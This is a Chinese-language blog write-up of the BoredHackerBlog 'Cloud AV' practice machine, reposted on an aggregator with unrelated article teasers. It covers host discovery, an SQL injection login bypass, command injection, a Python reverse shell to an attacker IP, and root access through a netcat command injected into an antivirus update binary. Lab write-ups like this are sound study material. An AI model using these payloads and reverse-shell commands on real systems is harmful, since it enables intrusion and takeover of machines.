BoredHackerBlog: Cloud AV RT日记

这篇具有很好参考价值的文章主要介绍了BoredHackerBlog: Cloud AV RT日记。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

目录

信息搜集

WEB漏洞攻击

拿shell


信息搜集

首先ifconfig查看自己IP,BoredHackerBlog: Cloud AV RT日记,今年十八系列,web安全,渗透

netdiscover查看同网段下主机

BoredHackerBlog: Cloud AV RT日记,今年十八系列,web安全,渗透

第三个应该是目标靶机。用nmap查看靶机开放端口:

BoredHackerBlog: Cloud AV RT日记,今年十八系列,web安全,渗透

开放22和8080,看看8080开的啥服务

WEB漏洞攻击

BoredHackerBlog: Cloud AV RT日记,今年十八系列,web安全,渗透

看到让我们输入邀请码。有输入框的第一个反应是RCE,尝试几次后无果。后续测试SQL注入,发现在输入"时报错

BoredHackerBlog: Cloud AV RT日记,今年十八系列,web安全,渗透

Flask框架,最后一段报错信息直接看到搜索逻辑源码BoredHackerBlog: Cloud AV RT日记,今年十八系列,web安全,渗透

输入其它内容时全部回显BoredHackerBlog: Cloud AV RT日记,今年十八系列,web安全,渗透

推断布尔盲注,order by 尝试字段数

1" order by 1--+ 正常BoredHackerBlog: Cloud AV RT日记,今年十八系列,web安全,渗透

1" order by 2--+ 报错BoredHackerBlog: Cloud AV RT日记,今年十八系列,web安全,渗透

后续尝试

1" and left(version(),1)=5 --+

无果

直接万能密码开摆:

1" or 1=1 --+BoredHackerBlog: Cloud AV RT日记,今年十八系列,web安全,渗透

emmmm,进来了

还是看看能否RCE

输入111|ls

BoredHackerBlog: Cloud AV RT日记,今年十八系列,web安全,渗透

拿shell

出了,弹个shell试试

cat | python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.112.72",5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'

成了

BoredHackerBlog: Cloud AV RT日记,今年十八系列,web安全,渗透

看看文件权限BoredHackerBlog: Cloud AV RT日记,今年十八系列,web安全,渗透

BoredHackerBlog: Cloud AV RT日记,今年十八系列,web安全,渗透

有一个ROOT文件,下面有它的C文件,读一下看看BoredHackerBlog: Cloud AV RT日记,今年十八系列,web安全,渗透

发现程序定义了一个执行参数,如果程序在执行中不包含参数,则会打印出:

This tool lets you update antivirus rules\nPlease supply command line arguments for freshclam;

如果执行程序使用了参数,那么程序就会执行freshclam,运行病毒库更新

可以试试提权:

./update_cloudav "666 | nc 192.168.112.72 5555|/bin/bash|nc 192.168.112.72 6666"

BoredHackerBlog: Cloud AV RT日记,今年十八系列,web安全,渗透

拿到ROOT权限文章来源地址https://www.toymoban.com/news/detail-734849.html

到了这里,关于BoredHackerBlog: Cloud AV RT日记的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • DETR系列:RT-DETR(一) 论文解析

    论文:《DETRs Beat YOLOs on Real-time Object Detection》 2023.4 DETRs Beat YOLOs on Real-time Object Detection:https://arxiv.org/pdf/2304.08069.pdf 源码地址:https://github.com/PaddlePaddle/PaddleDetection/tree/develop/configs/rtdetr 本文是RT0-DETR的论文解析,详细部署请查看DETR系列:RT-DETR实战部署 第一行是YOLO系列算法

    2024年02月05日
    浏览(45)
  • RT-Thread系列10——ETH网口设备

    ==== 文章汇总(有代码汇总) ==== 目标:使用网口和电脑通信。 RT-Thread studio,版本: 2.2.6,不一样其实区别也不大 RT-Thread:标准版,4.0.3版本 芯片包版本:0.1.9 开发板:自己做的,主控STM32F407VET6。 网口芯片:太网口LAN8720A cubemx版本:6.8.1 cubemx版本不一样的话,网口的配置过

    2024年02月21日
    浏览(33)
  • 多线程系列(十八) -AQS原理浅析

    在之前的文章中,我们介绍了 ReentrantLock、ReadWriteLock、CountDownLatch、CyclicBarrier、Semaphore、ThreadPoolExecutor 等并发工具类的使用方式,它们在请求共享资源的时候,都能实现线程同步的效果。 在使用方式上稍有不同,有的是独占式,多个线程竞争时只有一个线程能执行方法,比

    2024年03月13日
    浏览(50)
  • .net core 6.0 web api 爬坑日记

    本人以前做前端开发的,就是 html , js , css , vue , react 那些 此前没接触过 .net 甚至没接触过 C# , 若哪里不对或有缺陷欢迎指出,以便改正! ^_^ 这是当前所在公司的一个小项目 , 虽然这个项目不大, 但是奈何我又喜欢新版本,所以直接用的 .net core 6.0 而且多数问题百度, 谷歌 都只有

    2024年02月04日
    浏览(57)
  • cfa一级考生复习经验分享系列(十八)

    考点回忆:其实机考大家的题目都不大一样,是抽题的形式,在这里只罗列一些我遇到的印象比较深,同时大家容易忽略或犯错的点。道德考了很多GIPS;经济学考了费雪方程、货币中性、价格歧视、需求的收入弹性计算;数量考了相关系数的检验;财报总体还好,比较有迷惑

    2024年02月02日
    浏览(49)
  • C++系列十八:访问控制符

    在C++中,访问权限控制符用于限制类成员的访问权限,主要包括public、private和protected三种。这些访问权限控制符用于控制类成员的访问级别,从而保证数据的封装性和安全性。 public访问权限表示类成员可以从任何地方被访问,包括类的外部和友元函数。在类的内部,可以直

    2024年02月02日
    浏览(43)
  • RT-Thread GD32 ARM系列 BSP 制作教程

    BSP 框架结构如下图所示: GD32 ARM系列BSP架构主要分为三个部分:libraries、tools和具体的Boards,其中libraries包含了GD32的通用库,包括每个系列的Firmware Library以及适配RT-Thread的drivers;tools是生成工程的Python脚本工具;另外就是Boards文件,当然这里的Boards有很多,我这里值列举了

    2024年01月17日
    浏览(45)
  • 【javaweb】学习日记Day4 - Maven 依赖管理 Web入门

    目录 一、Maven入门 - 管理和构建java项目的工具 1、IDEA如何构建Maven项目 2、Maven 坐标 (1)定义 (2)主要组成 3、IDEA如何导入和删除项目 二、Maven - 依赖管理 1、依赖配置 2、依赖传递 (1)查看依赖  (2)排除依赖 3、依赖范围 三、Web 入门 1、Springboot web入门体验 2、HTTP简述

    2024年02月11日
    浏览(53)
  • 软件设计模式系列之十八——迭代器模式

    迭代器模式是一种行为型设计模式,它允许客户端逐个访问一个聚合对象中的元素,而不暴露该对象的内部表示。迭代器模式提供了一种统一的方式来遍历不同类型的集合,使客户端代码更加简洁和可复用。 为了更好地理解迭代器模式,让我们考虑一个简单的例子:一个图书

    2024年02月08日
    浏览(46)
  • 【Oracle】Oracle系列十八--Oracle RAC

    【Oracle】Oracle系列之一–Oracle数据类型 【Oracle】Oracle系列之二–Oracle数据字典 【Oracle】Oracle系列之三–Oracle字符集 【Oracle】Oracle系列之四–用户管理 【Oracle】Oracle系列之五–Oracle表空间 【Oracle】Oracle系列之六–Oracle表分区 【Oracle】Oracle系列之七–表的创建与管理 【Oracl

    2024年02月07日
    浏览(39)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包